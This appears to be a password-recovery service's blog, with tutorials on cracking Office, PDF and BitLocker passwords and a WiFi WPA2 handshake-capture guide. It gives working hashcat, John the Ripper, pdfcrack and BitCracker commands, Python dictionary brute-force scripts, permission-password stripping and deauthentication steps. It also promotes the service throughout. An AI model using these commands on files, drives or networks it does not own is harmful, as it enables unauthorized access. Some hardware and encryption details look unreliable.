开发者巴沙

Word/Excel文档密码忘记了？加密Office文件恢复方法大全（2026最新）

Thu, 21 May 2026 10:00:00 +0800

前言

Office 文档加密是职场中最常见的数据保护手段。根据微软的统计，全球有超过 3 亿用户每天使用 Office 办公套件。但当你给一份重要的 Word 合同或 Excel 报表设置了打开密码，过了一段时间却怎么也想不起来时，那种焦虑感相信很多人都体会过。

本文将系统介绍 Office 文档密码恢复的各种方法，覆盖 Word（.doc/.docx）、Excel（.xls/.xlsx）和 PowerPoint（.pptx）三大格式。

先搞清楚：Office 文档的两种密码

在开始之前，需要了解 Office 文档有两种不同类型的密码，破解难度完全不同：

密码类型	说明	破解难度
打开密码	打开文件时需要输入	较高（AES-128/256 加密）
修改密码	打开可以查看，编辑时需要	极低（可以绕过）

如果是"修改密码"，恭喜你，基本不需要破解。用 WPS 或 LibreOffice 打开文件，另存为新文件，修改密码就会丢失。本文主要讨论的是更难处理的"打开密码"。

Office 文档加密算法的演变

了解加密算法有助于判断破解难度：

Office 97-2003 (.doc/.xls)：使用 RC4 加密（40-bit 或 56-bit），存在已知漏洞，破解相对容易
Office 2007 (.docx/.xlsx)：使用 AES-128 加密，安全性大幅提升
Office 2010+ (.docx/.xlsx)：使用 AES-128 并增加了迭代次数（100,000 次 SHA-1），破解速度慢很多
Office 2016+：默认使用 AES-256，是目前最强的加密标准

💡 小贴士：如果你的文件是 .doc 或 .xls 老格式，破解速度会比 .docx 快几十倍。

方法一：msoffcrypto-tool（Python 库，推荐入门）

msoffcrypto-tool 是一个专门处理 Office 文件加密的 Python 库，可以检测加密类型并进行密码恢复。

安装

1

pip install msoffcrypto-tool

检测文件是否加密

1
2
3
4
5


import msoffcrypto

with open("encrypted.docx", "rb") as f:
 file = msoffcrypto.OfficeFile(f)
 print(f"是否加密: {file.is_encrypted()}")

使用字典破解

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


import msoffcrypto

def crack_office(file_path, wordlist_path):
 with open(file_path, "rb") as f:
 file = msoffcrypto.OfficeFile(f)

 if not file.is_encrypted():
 print("文件未加密")
 return

 with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as wf:
 for line in wf:
 pwd = line.strip()
 try:
 if file.load_key(password=pwd):
 print(f"✅ 密码找到: {pwd}")

 # 解密文件
 with open("decrypted.docx", "wb") as out:
 file.decrypt(out)
 print("文件已解密保存")
 return pwd
 except Exception:
 continue

 print("❌ 字典中未找到密码")

crack_office("report.xlsx", "rockyou.txt")

优缺点

优点：纯 Python，跨平台，代码简洁
缺点：速度一般，不支持 GPU 加速

方法二：John the Ripper + office2john

John the Ripper 不仅支持压缩包，也支持 Office 文档的密码破解。

使用步骤

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# 1. 提取 Office 文件的密码哈希
python /path/to/john/run/office2john.py encrypted.docx > hash.txt

# 输出类似：
# encrypted.docx:$office$*2013*100000*256*16*...（很长的哈希串）

# 2. 使用字典攻击
john --wordlist=rockyou.txt hash.txt

# 3. 查看结果
john --show hash.txt

不同 Office 版本的哈希模式

版本	John 模式标识	破解速度参考
Office 2003	$oldoffice$	快（约 100K/s）
Office 2007	`$office$2007`	中（约 10K/s）
Office 2010	`$office$2010`	慢（约 1K/s）
Office 2013+	`$office$2013`	很慢（约 500/s）

以上速度参考基于 GTX 1080 显卡使用 Hashcat 的测试结果。

方法三：Hashcat GPU 加速破解

如果你有独立显卡，Hashcat 是破解 Office 密码最快的方案。

Office 文档对应的 Hashcat 模式

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# Office 2003 (.doc/.xls)
hashcat -m 9700 -a 0 hash.txt wordlist.txt

# Office 2007 (.docx/.xlsx)
hashcat -m 9400 -a 0 hash.txt wordlist.txt

# Office 2010 (.docx/.xlsx)
hashcat -m 9500 -a 0 hash.txt wordlist.txt

# Office 2013+ (.docx/.xlsx)
hashcat -m 9600 -a 0 hash.txt wordlist.txt

使用掩码攻击（已知密码格式）

如果你记得密码大概是 “公司名+年份” 的格式，可以用掩码缩小范围：

1
2
3
4


# 假设密码格式为 "MyCompany202X"
hashcat -m 9600 -a 3 hash.txt "MyCompany202?d"

# ?d = 数字 0-9，这样只需尝试 10 个组合

优缺点

优点：GPU 并行计算，速度极快
缺点：需要独显，配置复杂，Office 2013+ 版本由于高迭代次数，即使 GPU 加速也较慢

方法四：VBA 宏破解修改密码

如果文件只有"修改密码"（而非打开密码），可以用 VBA 宏直接绕过：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


Sub RemoveWriteProtection()
 Dim doc As Document
 Set doc = ActiveDocument

 ' 移除写保护
 If doc.ProtectionType <> wdNoProtection Then
 doc.Unprotect
 End If

 MsgBox "修改密码已移除！"
End Sub

⚠️ 注意：此方法仅对"修改密码"有效，对"打开密码"无效。

方法五：LibreOffice 绕过法

某些情况下，LibreOffice 对加密文件的处理方式和 Microsoft Office 不同：

安装 LibreOffice（免费开源）
用 LibreOffice 打开加密的 .doc/.xls 文件
部分旧格式文件可能不弹出密码框直接打开
另存为新文件即可

成功率：仅对 Office 97-2003 格式的部分加密文件有效，对 .docx/.xlsx 基本无效。

方法六：在线云端恢复服务

对于不熟悉命令行操作的用户，或者本地算力不足以应对 Office 2013+ 的高强度加密时，云端恢复服务是最省心的选择。

猫密网 (Catpasswd) 支持 Word、Excel、PowerPoint 等 Office 文档的在线密码恢复：

为什么 Office 文件特别适合用云端服务？

Office 2010 之后的文档加密迭代次数非常高（10 万次 SHA-1），这意味着：

每尝试一个密码都需要大量的计算
普通电脑的 CPU 每秒可能只能尝试几百个密码
一个 100 万条的字典，本地跑可能需要几个小时甚至几天

而云端分布式集群可以并行处理，大幅缩短等待时间。

使用流程

访问猫密网 → 恢复页面
上传加密的 Office 文件（Word/Excel/PPT，最大 100MB）
填写邮箱地址
等待系统自动恢复，成功后邮件通知

对于机密文件，可以使用平台的特征提取工具在本地提取文件特征后仅上传特征数据，源文件不会离开你的电脑，100% 保证文档安全。

费用说明

猫密网提供免费恢复模式，可以先测试能否恢复。如果免费版未能成功，可以升级到专业版使用更大的字典库和更快的计算资源。

各方法对比

方法	支持格式	速度	难度	适合场景
msoffcrypto-tool	全版本 Office	中	低	程序员自用
John the Ripper	全版本 Office	中	中	技术人员
Hashcat	全版本 Office	快	高	有独显用户
VBA 宏	仅修改密码	即时	低	仅修改密码场景
LibreOffice	旧版 .doc/.xls	即时	低	碰运气
猫密网	全版本 Office	快	极低	所有人

提高成功率的实用技巧

先确定 Office 版本：不同版本的加密算法差异很大，.doc 格式比 .docx 容易破解得多
回忆密码规则：很多人设置 Office 密码有固定模式，比如 “公司名+年份”、“姓名+手机号后四位” 等
试试弱口令字典：大量用户使用 “123456”、“password”、“qwerty” 等弱密码，先用常见密码字典试一遍
Excel 的 .xls 特别注意：旧版 Excel 的 40-bit RC4 加密存在漏洞，可以用更高级的密码分析攻击
不要轻信"在线秒破"网站：很多小网站会收集你的文件用于非法用途，选择有信誉的平台

常见问题

Q: 文件只是设置了"只读保护"而非加密，怎么解除？

如果是 Word 的"限制编辑"或 Excel 的"工作表保护"，那不是真正的加密，可以通过以下方法解除：

将文件后缀改为 .zip，打开后找到 word/settings.xml，删除 <w:documentProtection> 标签
或用 VBA 宏解除（见方法四）

Q: WPS 加密的文件和 Office 加密的一样吗？

WPS 兼容 Office 的加密格式，但部分 WPS 独有的加密方式使用了不同的算法。如果是 WPS 加密的文件，建议先用 WPS 另存为 .docx 格式再处理。

Q: Excel 文件有"打开密码"和"工作簿保护"两层，怎么分别处理？

“打开密码"是文件级加密，需要本文介绍的方法破解。“工作簿保护"只是限制了结构修改（不能增删工作表），可以用 VBA 直接绕过。

Q: 恢复出的密码能直接用在 WPS 上吗？

可以。WPS 完全兼容 Office 的加密格式，找到的密码在 WPS 和 Microsoft Office 上通用。

总结

Office 文档密码恢复的核心难点在于新版本 Office（2010+）的高迭代次数加密。对于旧版 .doc/.xls 文件，大部分方法都能较快恢复；对于新版 .docx/.xlsx 文件，建议使用 GPU 加速的 Hashcat 或借助猫密网这样的云端服务。

最重要的是，在加密文件之前，建议使用密码管理器妥善保存密码，避免日后给自己制造麻烦。

PDF文件加密了怎么解除？PDF密码破解完整指南（2026最新）

Wed, 20 May 2026 10:00:00 +0800

前言

PDF 是工作中最常用的文档格式之一。从电子合同到学术论文，从银行账单到政府公文，PDF 无处不在。而当一份重要的 PDF 文件被加密，而你恰好忘记了密码，那种无力感相信很多人都经历过。

好消息是，PDF 的加密体系虽然有多个版本，但其中不少存在已知的弱点。这篇文章将带你全面了解 PDF 加密机制，并给出实用的密码恢复方案。

PDF 加密基础知识

两种密码：打开密码 vs 权限密码

PDF 的加密设计中包含两种不同层级的密码：

密码类型	英文名称	作用	安全性
打开密码 (User Password)	User Password	必须输入才能查看内容	高（文件内容被加密）
权限密码 (Owner Password)	Owner Password	限制打印、复制、编辑等操作	低（可以绕过）

关键区别：权限密码不加密文件内容本身，只是通过 PDF 阅读器来限制功能。这意味着即使不知道权限密码，也有方法绕过限制。而打开密码则对文件内容进行了真正的加密。

PDF 加密版本演变

版本	加密方式	安全性	说明
PDF 1.1-1.3	RC4 40-bit	❌ 极弱	几秒可破解
PDF 1.4	RC4 128-bit	⚠️ 较弱	存在已知漏洞
PDF 1.5-1.6	RC4 128-bit (AES)	⚠️ 中等	改进但仍有弱点
PDF 1.7 Extension 3	AES-128	✅ 较强	Adobe Acrobat 9+
PDF 2.0	AES-256	✅✅ 很强	ISO 32000-2 标准

一、权限密码（Owner Password）的绕过方法

权限密码是最容易处理的，有以下几种方案：

方法 1：使用 qpdf 一键移除（推荐）

qpdf 是一个免费的 PDF 转换工具，可以直接移除权限密码：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# 安装
# Ubuntu/Debian
sudo apt install qpdf

# macOS
brew install qpdf

# Windows - 下载安装包
# https://github.com/qpdf/qpdf/releases

# 移除权限密码（不需要知道原密码）
qpdf --decrypt input.pdf output.pdf

执行后，output.pdf 将不再有任何编辑、打印、复制限制。

方法 2：Python pikepdf 库

1
2
3
4
5
6
7
8


import pikepdf

# 打开有权限密码的 PDF（不需要密码）
pdf = pikepdf.open("restricted.pdf")

# 保存为新文件（自动移除权限限制）
pdf.save("unrestricted.pdf")
print("✅ 权限密码已移除")

安装 pikepdf：

1

pip install pikepdf

方法 3：在线工具

ilovepdf.com - 上传 PDF 即可解锁
smallpdf.com - 免费额度有限
pdf2go.com - 支持批量处理

⚠️ 隐私提醒：在线工具会上传你的文件到第三方服务器，敏感文件不建议使用。如需在线处理，建议选择支持文件销毁的正规平台。

方法 4：Chrome 浏览器打印法

用 Chrome 浏览器打开受权限密码保护的 PDF
Chrome 可能直接忽略权限限制显示内容
按 Ctrl+P → 选择"另存为 PDF"
新的 PDF 文件将不带任何限制

二、打开密码（User Password）的破解方法

打开密码对文件内容进行了真正的加密，需要使用密码恢复手段。

方法 1：pdfcpu + John the Ripper

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# 1. 从 PDF 中提取密码哈希
# 使用 pdf2john 工具（John the Ripper 附带）
python /path/to/john/run/pdf2john.py encrypted.pdf > hash.txt

# 输出格式：
# encrypted.pdf:$pdf$2*3*128*-1060*1*16*...

# 2. 使用字典攻击
john --wordlist=rockyou.txt hash.txt

# 3. 查看结果
john --show hash.txt

方法 2：Hashcat GPU 加速

Hashcat 对不同版本的 PDF 有单独的模式编号：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# PDF 1.1-1.3 (RC4 40-bit) - 模式 10400
hashcat -m 10400 -a 0 hash.txt wordlist.txt

# PDF 1.4-1.6 (RC4 128-bit) - 模式 10500
hashcat -m 10500 -a 0 hash.txt wordlist.txt

# PDF 1.7 Extension 3 (AES-128) - 模式 10600
hashcat -m 10600 -a 0 hash.txt wordlist.txt

# PDF 1.7 Extension 8 (AES-256) - 模式 10700
hashcat -m 10700 -a 0 hash.txt wordlist.txt

各版本 PDF 的破解速度对比

以 GTX 3080 显卡为参考：

PDF 版本	Hashcat 模式	大约速度	破解 6 位数字密码时间
1.1-1.3	10400	~50M/s	不到 1 秒
1.4-1.6	10500	~10M/s	约 100 秒
1.7 Ext 3	10600	~50K/s	约 20 天
1.7 Ext 8	10700	~10K/s	约 100 天

可以看到，PDF 版本越高，破解难度呈指数级增长。

方法 3：Python + pikepdf 字典爆破

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


import pikepdf

def crack_pdf(pdf_path, wordlist_path):
 """使用字典尝试破解 PDF 打开密码"""
 with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f:
 for i, line in enumerate(f):
 pwd = line.strip()
 try:
 pdf = pikepdf.open(pdf_path, password=pwd)
 print(f"✅ 第 {i+1} 次尝试，密码找到: {pwd}")

 # 保存解密文件
 pdf.save(f"decrypted_{pdf_path}")
 return pwd
 except pikepdf.PasswordError:
 continue
 except Exception as e:
 print(f"尝试 '{pwd}' 时出错: {e}")
 continue

 print("❌ 字典中未找到密码")
 return None

crack_pdf("secret.pdf", "rockyou.txt")

方法 4：PDFCrack（轻量级开源工具）

pdfcrack 是一个专门针对 PDF 的密码破解工具：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# 编译安装
git clone https://github.com/robins/pdfcrack.git
cd pdfcrack
make

# 使用字典破解
./pdfcrack -f encrypted.pdf -w wordlist.txt

# 暴力破解（指定字符集和长度范围）
./pdfcrack -f encrypted.pdf --minlen=1 --maxlen=6 -c "0123456789"

方法 5：云端在线恢复服务

对于不方便本地部署工具的用户，或者 PDF 版本较高（AES-128/256）本地算力不足的情况，可以考虑云端恢复服务。

猫密网 (Catpasswd) 支持部分加密类型的 PDF 文件密码恢复。使用流程非常简单：

访问 catpasswd.com → 上传文件
上传加密的 PDF 文件
填写邮箱等待通知
系统利用云端算力自动尝试千万级密码组合

对于高度敏感的 PDF 文件（如合同、财报、法律文书），猫密网提供本地特征提取工具，你可以在自己的电脑上提取文件加密特征，仅上传特征数据（几 KB），源文件完全不会离开你的电脑。

💡 小贴士：猫密网提供免费恢复模式，可以先试试能不能找回，不成功不收费。

PDF 密码破解的实战技巧

1. 先确定 PDF 版本

1
2
3
4
5
6
7


# 查看 PDF 版本和加密信息
qpdf --show-encryption encrypted.pdf

# 或使用 Python
import pikepdf
pdf = pikepdf.open("encrypted.pdf", password="") # 如果有打开密码需要填入
print(pdf.Root.Version)

了解版本后，可以针对性选择破解策略：低版本 PDF 可以用更高效的攻击方式。

2. 利用 PDF 的已知漏洞

PDF 1.4（RC4 128-bit）有一个著名的漏洞：权限密码和打开密码使用相同的加密密钥。这意味着如果你能绕过权限密码（用 qpdf），实际上就获得了文件内容。

3. 常见的 PDF 密码模式

很多人设置 PDF 密码时会用以下模式：

纯数字（如身份证号、手机号、生日）
公司名/文件名 + 年份
“password”、“123456” 等弱口令
项目代号或合同编号

建议先用这些常见模式生成自定义字典，比盲目使用通用字典效率高得多。

4. 银行/政府类 PDF 的特殊处理

银行账单、税务文件等通常使用数字密码（如身份证后6位、手机号后4位）。可以先用纯数字字典尝试：

1
2
3
4


# 生成 6 位纯数字字典
with open("digits6.txt", "w") as f:
 for i in range(1000000):
 f.write(f"{i:06d}\n")

各方法对比总结

密码类型	方法	工具	难度	速度
权限密码	qpdf 移除	qpdf	极低	即时
权限密码	pikepdf 保存	Python	低	即时
权限密码	Chrome 打印	浏览器	极低	即时
打开密码	John the Ripper	命令行	中	中
打开密码	Hashcat	GPU	高	快
打开密码	pdfcrack	命令行	中	中
打开密码	猫密网	网页	极低	快

常见问题

Q: PDF 密码和 Word 密码哪个更难破解？

一般来说，高版本 PDF（AES-256）比 Word 2013+ 更难破解，因为 PDF 的密钥派生函数（KDF）迭代次数更多。但低版本 PDF（RC4 40-bit）比任何版本的 Word 都容易得多。

Q: Adobe Acrobat 能帮忙找回密码吗？

不能。Adobe Acrobat 只能设置和管理密码，没有"找回密码"功能。如果你忘记了打开密码，只能通过本文介绍的破解方法。

Q: 为什么有的 PDF 在线解锁工具不工作？

在线解锁工具（如 ilovepdf）只能移除权限密码（Owner Password），对打开密码（User Password）无效。如果文件有打开密码，必须使用密码恢复工具。

Q: 扫描版 PDF 和文字版 PDF 在加密上有什么区别？

加密方式没有区别，但扫描版 PDF 文件通常更大（因为包含图片），上传到云端服务时可能需要注意文件大小限制。超过 100MB 的文件可以使用猫密网的特征提取工具来处理。

总结

PDF 密码破解的难度取决于 PDF 版本和加密算法：

权限密码：用 qpdf 或 pikepdf 一键移除，非常简单
打开密码 + 低版本 PDF：用 John the Ripper 或 pdfcrack，速度很快
打开密码 + 高版本 PDF：建议使用 Hashcat GPU 加速或猫密网等云端服务

最好的策略永远是：设置密码时就记录在安全的地方（如密码管理器），避免日后给自己制造麻烦。但如果已经忘记了密码，希望本文的方法能帮到你。

BitLocker加密硬盘忘记密码怎么办？数据恢复完整指南（2026最新）

Tue, 19 May 2026 10:00:00 +0800

前言

BitLocker 是 Windows 内置的全盘加密功能。从 Windows 10 Pro 开始，系统就自带了这个功能。很多用户在购买新电脑后发现硬盘已经被 BitLocker 自动加密了，而自己完全不知道。

当电脑崩溃、重装系统、或更换主板后，BitLocker 会要求输入恢复密钥。如果你之前没有保存过这个密钥，整个硬盘的数据就可能永久丢失。

这篇文章将系统介绍 BitLocker 的恢复机制和各种密码找回方法。

BitLocker 的三种解锁方式

BitLocker 支持三种解锁方式，了解它们对于数据恢复至关重要：

解锁方式	说明	适用场景
密码	用户设置的解锁密码	移动硬盘、U盘
恢复密钥	48 位数字密钥	系统盘、忘记密码时的备用方案
TPM 芯片	主板上的可信平台模块自动解锁	系统盘（正常使用时无感）

⚠️ 重要提醒：恢复密钥是最终的安全网。即使你忘记了密码，只要有 48 位恢复密钥，就能解锁 BitLocker。

第一步：找回 BitLocker 恢复密钥

在尝试破解之前，强烈建议先找回恢复密钥，因为这比破解密码快得多。

1. Microsoft 账户（最常见的位置）

如果你的 Windows 使用了 Microsoft 账户登录，恢复密钥可能已自动备份到云端：

访问 https://account.microsoft.com/devices/recoverykey
用你的 Microsoft 账户登录
查看是否有对应设备的恢复密钥

2. Azure Active Directory（企业用户）

如果电脑加入了公司域（Azure AD），恢复密钥可能存储在 Azure 中：

访问 https://myaccount.microsoft.com
点击"设备" → 选择你的设备 → 查看 BitLocker 密钥
或联系公司 IT 管理员获取

3. 打印的纸质备份

设置 BitLocker 时，系统提供了"打印恢复密钥"的选项。检查你的重要文件柜。

4. USB 备份

BitLocker 也支持将恢复密钥保存为 USB 驱动器上的文本文件。检查你所有的 U 盘。

5. Active Directory（传统域环境）

如果电脑加入了传统 Windows 域：

联系域管理员
管理员可以在"Active Directory 用户和计算机" → 计算机属性 → “BitLocker 恢复"中找到

第二步：通过命令行管理 BitLocker

查看 BitLocker 状态

打开管理员命令提示符或 PowerShell：

1
2
3
4
5


# 查看所有驱动器的 BitLocker 状态
manage-bde -status

# 查看特定驱动器
manage-bde -status C:

输出示例：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


卷 C: [Windows]
[OS 卷]

 大小: 237.87 GB
 BitLocker 版本: 2.0
 转换状态: 已完全加密
 加密百分比: 100.0%
 加密方法: XTS-AES 128
 保护状态: 保护打开
 锁定状态: 已解锁
 标识符: {ABCD1234-...}
 密钥保护程序:
 TPM
 恢复密码

使用恢复密钥解锁

如果你找到了 48 位恢复密钥：

1
2
3
4
5


# 使用恢复密钥解锁
manage-bde -unlock D: -RecoveryPassword 123456-123456-123456-123456-123456-123456-123456-123456

# 或使用恢复密钥文件
manage-bde -unlock D: -RecoveryKeyFile "E:\BitLocker Recovery Key.txt"

重置 BitLocker 密码

如果你能解锁驱动器但想更换密码：

1
2
3
4
5


# 更改 BitLocker 密码
manage-bde -changepassword D:

# 或添加新的密码保护程序
manage-bde -protectors -add D: -password

第三步：BitLocker 密码破解方法

如果恢复密钥也找不到了，以下是密码恢复的技术方案。

方法 1：dislocker（Linux 下挂载 BitLocker 卷）

dislocker 是 Linux 下唯一能读写 BitLocker 加密卷的工具：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


# 安装
sudo apt install dislocker

# 创建挂载点
sudo mkdir -p /mnt/bitlocker /mnt/dislocker

# 使用恢复密码挂载
sudo dislocker -V /dev/sdb1 -p123456-123456-123456-123456-123456-123456-123456-123456 -- /mnt/bitlocker

# 或使用密码挂载
sudo dislocker -V /dev/sdb1 -uYourPassword -- /mnt/bitlocker

# 挂载解密后的文件系统
sudo mount -o loop /mnt/bitlocker/dislocker-file /mnt/dislocker

# 现在可以访问文件了
ls /mnt/dislocker

方法 2：John the Ripper 提取并破解

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# 1. 从 BitLocker 卷提取密码哈希
# 使用 bitlocker2john 工具
./bitlocker2john -i /dev/sdb1 > bl_hash.txt

# 输出格式：
# $bitlocker$1$16$...$100000$12$...

# 2. 使用字典攻击
john --wordlist=rockyou.txt bl_hash.txt

# 3. 查看结果
john --show bl_hash.txt

方法 3：Hashcat GPU 加速

1
2
3
4
5
6


# BitLocker 在 Hashcat 中的模式编号是 22100
hashcat -m 22100 -a 0 bl_hash.txt wordlist.txt

# 使用掩码攻击（如果记得密码部分信息）
# 假设记得密码以 "My" 开头，后跟 4 个数字
hashcat -m 22100 -a 3 bl_hash.txt "My?d?d?d?d"

速度参考（GTX 3080）：约 30K/s，比 Office 文档快，但也不算特别快。

方法 4：BitCracker（开源专用工具）

BitCracker 是专门为 BitLocker 设计的密码破解工具：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


# 编译安装
git clone https://github.com/e-ago/bitcracker.git
cd bitcracker
mkdir build && cd build
cmake .. && make

# 提取哈希
./bitcracker_hash -i /dev/sdb1 -o /tmp/hashes

# 使用字典破解
./bitcracker_attack -m dict -h /tmp/hashes/hash_user_pass.txt -d wordlist.txt -o /tmp/output

# 使用暴力破解（指定密码长度）
./bitcracker_attack -m bruteforce -h /tmp/hashes/hash_user_pass.txt -o /tmp/output -l 6 -u 8

方法 5：商业取证工具

对于企业或执法场景，以下商业工具可以处理 BitLocker：

Passware Kit（$3,195 起）：业界标准取证工具，支持 BitLocker、FileVault 等
Elcomsoft System Recovery（$249）：支持从休眠文件和内存镜像提取密钥
Magnet AXIOM：数字取证平台，支持从内存中提取 BitLocker 密钥

方法 6：从内存/休眠文件中提取密钥

如果电脑在 BitLocker 解锁状态下曾经休眠或崩溃，内存镜像中可能残留有解密密钥：

1
2
3
4
5
6
7


# 从 Windows 休眠文件提取（需要 Volatility 取证框架）
# 1. 获取 hiberfil.sys 文件
# 2. 使用 Volatility 分析
volatility -f hiberfil.sys --profile=Win10x64 bitlocker

# 或使用 AESKeyFinder 从内存镜像提取 AES 密钥
aeskeyfinder memory_dump.raw

💡 注意：此方法需要专业取证知识，且成功率取决于内存镜像的质量和时效性。

方法 7：云端 BitLocker 恢复服务

如果你不想折腾命令行工具，或者本地算力不足，可以借助云端服务：

猫密网 (Catpasswd) 支持 BitLocker 加密文件的密码恢复。

处理大文件的技巧

BitLocker 加密的通常是整个硬盘分区（几十 GB 甚至几 TB），不可能整个上传。处理方式是：

使用猫密网提供的特征提取工具（Catpasswd-Convert.exe）
在本地对 BitLocker 加密卷运行特征提取
工具只提取加密元数据（几 KB 的特征文件）
上传特征文件到猫密网进行密码恢复
源文件和加密数据完全留在本地，100% 安全

这种方式完美解决了大文件上传的问题，同时保护了数据隐私。

BitLocker 各破解方法对比

方法	适用场景	难度	速度	成本
Microsoft 账户找回	有 MS 账户的用户	极低	即时	免费
Azure AD 找回	企业用户	低	即时	免费
dislocker + 已知密码	Linux 挂载	中	即时	免费
John the Ripper	通用破解	中	中	免费
Hashcat	GPU 用户	高	快	免费
BitCracker	专用工具	中	中	免费
Passware Kit	企业/取证	低	快	$3195+
内存取证	有内存镜像	极高	不确定	免费
猫密网	普通用户	极低	快	免费/付费

BitLocker 密码恢复的实用技巧

1. 优先搜索恢复密钥

再次强调：找恢复密钥比破解密码快 100 倍。搜索以下位置：

Microsoft 账户在线
购买电脑时的文档
公司 IT 部门
曾经备份过的外接硬盘
电子邮箱（搜索"BitLocker"关键词）

2. 利用 TPM 自动解锁

如果硬盘还在原来的电脑上且 TPM 芯片正常，可以尝试：

1
2
3
4
5


# 查看 TPM 状态
tpm.msc

# 如果 TPM 可用，重新启用 BitLocker 自动解锁
manage-bde -protectors -enable C:

3. 密码模式分析

BitLocker 密码通常有以下特点：

很多人使用 Windows 登录密码作为 BitLocker 密码
PIN 码解锁通常是 4-6 位数字
移动硬盘的 BitLocker 密码可能与电脑登录密码相同

4. 不要贸然关闭 BitLocker

如果你不确定能否恢复数据，不要在未备份的情况下关闭 BitLocker 或清除 TPM，否则可能导致数据永久丢失。

常见问题

Q: BitLocker 有没有后门或万能密码？

没有。 BitLocker 使用的是 AES 加密（128 位或 256 位），目前没有已知的后门。微软也无法帮你绕过加密。唯一的恢复途径是找回恢复密钥或通过暴力/字典攻击破解密码。

Q: 重装系统后 BitLocker 要求输入恢复密钥，怎么办？

这是因为重装系统改变了 TPM 的状态。解决方法：

先在 Microsoft 账户中找恢复密钥
用恢复密钥解锁
然后可以关闭并重新启用 BitLocker

Q: BitLocker To Go（U盘/移动硬盘）的密码和系统盘一样吗？

不一样。BitLocker To Go 是用于可移动驱动器的，密码是用户手动设置的。系统盘的 BitLocker 通常由 TPM 自动管理，用户可能从未设置过密码。

Q: BitLocker 加密的外接硬盘能直接挂载到 Mac 上吗？

macOS 原生不支持 BitLocker。需要用 dislocker 或第三方工具（如 Hasleo BitLocker Anywhere for Mac，$39.95）。

Q: 加密硬盘太大（几个 TB），怎么处理？

不要整个上传。使用猫密网的特征提取工具在本地提取加密元数据，只上传几 KB 的特征文件即可进行密码恢复。

预防措施：避免再次丢失 BitLocker 密钥

备份恢复密钥到 Microsoft 账户：设置 BitLocker 时选择"保存到 Microsoft 账户”
打印纸质备份：放在安全的文件柜中
保存到 USB 驱动器：存放在与电脑不同的地方
使用密码管理器：把恢复密钥记录在 1Password、Bitwarden 等密码管理器中
企业用户：确保组策略配置了恢复密钥自动备份到 Active Directory

总结

BitLocker 数据恢复的优先级应该是：

首先找恢复密钥（Microsoft 账户 → Azure AD → 纸质备份 → IT 部门）
如果有恢复密钥：用 manage-bde 命令直接解锁
如果没有恢复密钥：使用 Hashcat / John the Ripper 尝试密码破解
如果需要帮助：使用猫密网的云端恢复服务 + 特征提取工具

BitLocker 的 AES 加密本身是非常安全的，关键在于密码的复杂度和恢复密钥的备份。养成备份密钥的好习惯，才能避免数据灾难。

WiFi密码忘了怎么找回？cap握手包破解教程（2026最新）

Mon, 18 May 2026 10:00:00 +0800

⚠️ 免责声明：本文仅用于恢复你自己拥有的 WiFi 网络密码。未经授权破解他人 WiFi 密码是违法行为，请勿用于非法用途。

前言

家里的 WiFi 密码设了太久没用忘记了？换了新手机想连 WiFi 却想不起密码？路由器管理页面也登不进去了？

对于使用 WPA/WPA2 加密的 WiFi 网络，密码不会以明文形式存储在路由器中。但好消息是，我们可以通过抓取 WiFi 的"握手包"（Handshake），然后使用密码恢复工具来找回丢失的密码。

基础知识：WPA2 握手包是什么？

四次握手（4-Way Handshake）

当设备（手机、电脑）连接 WPA2 WiFi 时，会和路由器进行一次"四次握手"过程：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


客户端 路由器
 | |
 | 1. ANonce (随机数A) |
 |<------------------------------|
 | |
 | 2. SNonce (随机数B) + MIC |
 |------------------------------>|
 | |
 | 3. GTK + MIC |
 |<------------------------------|
 | |
 | 4. 确认 |
 |------------------------------>|

这个握手过程包含了用于推导 WiFi 密码的关键信息。抓到这四次握手的数据包（保存为 .cap 文件），就可以离线尝试恢复密码。

关键点

cap 文件不包含密码本身，只包含验证密码是否正确的信息
需要至少一个设备在握手过程中在线（或手动触发重连）
WPA2 的加密算法是 AES-CCMP，没有已知漏洞，只能通过穷举法恢复密码

第一步：抓取 WPA2 握手包

所需工具

硬件：支持监听模式（Monitor Mode）的无线网卡
- 推荐：Alfa AWUS036ACH、TP-Link TL-WN722N（V1）、Alfa AWUS036NHA
- 注意：很多内置笔记本网卡不支持监听模式
软件：aircrack-ng 套件

安装 aircrack-ng

1
2
3
4
5
6
7


# Ubuntu/Debian
sudo apt install aircrack-ng

# macOS
brew install aircrack-ng

# Kali Linux（已预装）

抓取握手的完整流程

1. 查看无线网卡并切换到监听模式

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# 查看可用的无线网卡
iwconfig

# 假设网卡名称为 wlan0，先停止干扰进程
sudo airmon-ng check kill

# 切换到监听模式
sudo airmon-ng start wlan0

# 现在网卡名称变为 wlan0mon

2. 扫描周围的 WiFi 网络

1

sudo airodump-ng wlan0mon

屏幕会显示：

1
2
3


BSSID PWR Beacons #Data, #/s CH ENC AUTH CIPHER ESSID
AA:BB:CC:DD:EE:FF -45 100 50 2 6 WPA2 PSK CCMP MyHomeWiFi
11:22:33:44:55:66 -67 80 20 1 11 WPA2 PSK CCMP Neighbor_WiFi

记住目标 WiFi 的 BSSID（MAC 地址）和 CH（信道）。

3. 锁定目标网络并抓取握手包

1
2
3
4


# -w 指定保存文件名前缀
# --bssid 指定目标 BSSID
# -c 指定信道
sudo airodump-ng -w capture --bssid AA:BB:CC:DD:EE:FF -c 6 wlan0mon

4. 触发设备重新握手

等待自然握手可能很慢，可以主动发送解除认证包（Deauth）来强制设备重新连接：

1
2
3
4


# 在另一个终端执行
# -0 5 表示发送 5 个 deauth 包
# -a 是路由器的 BSSID
